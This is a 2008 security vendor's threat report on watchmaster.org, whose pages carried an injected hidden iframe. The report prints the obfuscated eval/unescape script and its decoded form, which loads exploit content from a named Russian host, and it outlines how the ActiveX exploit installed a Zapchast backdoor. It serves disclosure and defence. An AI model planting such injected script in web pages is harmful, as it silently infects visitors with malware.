ScanSafe

Client Login | International Users
Search


Report Date: April 15, 2008

Sitename Watchmaster.org
Nature Injected iFrame
First Blocked April 6, 2008
Severity High
Summary

On April 6, 2008, ScanSafe detected malicious content on the website of www.watchmaster.org. This site was heavily advertised via sponsored links appearing on Nextel, shopping.aol, bizrate, and similar ecommerce sites. Following is an example screenshot of one such advertisement:

Investigation revealed the presence of a malicious iframe appended to the HTML source page for watchmaster.org:

eval(unescape(" 6964%6f2e%736 1753d44%6f65% 2764636d%6574 %2e72%6965%283c% 69%6661%6d2061%6 d3d323537%30 64622072 3d%5c6874%702f%2f 72%616672%6c 722f6c76%3f2b 61687275 644d%6168726 e%646d29%2a34 36342b635c%2 7%2069%646835%38 20%6869%67%683d 31%377379%6c%65 5c64%6970%6c%61 %79206f65%5c 3e2f6661%6d3 e29 "));

The decoded version is as follows:

window.status='Done';document.write ('< i frame name=82950706d8ba src= \'http://traffurl.ru/sliv?'+ Math.round(Math.random ()*242694) +'c8\' width=582 height=417 style=\'display: none\'>')

The page loaded by this iframe also included an iframe that loads malicious content from http://traffurl.ru/slivv/index.php. On unprotected systems, successful exploit leads to the installation of a variant of the Zapchast backdoor Trojan family.

The integrity or legitimacy of the watchmaster.org website is not known. The registered whois data indicates ownership in Malaysia dating back to 2005 and the IP is hosted in Florida. According to Google, 186 sites link to watchmaster.org, but most or all of these appear to be related to recent sponsored links:

The nature of the malware involved and the high profile nature of the sponsored link hosts results in the threat being classified as High.
Infection Method

The malicious script referenced by the iframe attempts to exploit the Microsoft Internet Explorer ADODB.Stream ActiveX Control functionality in order to automate the download and installation of the Trojan.
Malware Behavior
  • Installed malware includes a backdoor Trojan which also attempts to connect to sites hosted in Russia.
  • When the downloaded file, load.exe, is run, it drops a hidden file named ~tmp1174.exe and loads this file as a process on the system. The malware then attempts to contact ya.ru and traffurl.ru in an attempt to download additional malware and instructions from the attacker(s)
Miscellaneous

The traffurl.ru domain used to distribute the Zapchast variant in the watchmaster.org compromise is also commonly associated with distribution or command and control of the Ldpinch family of keylogger/data theft Trojans.

This form was completed by:  Mary Landesman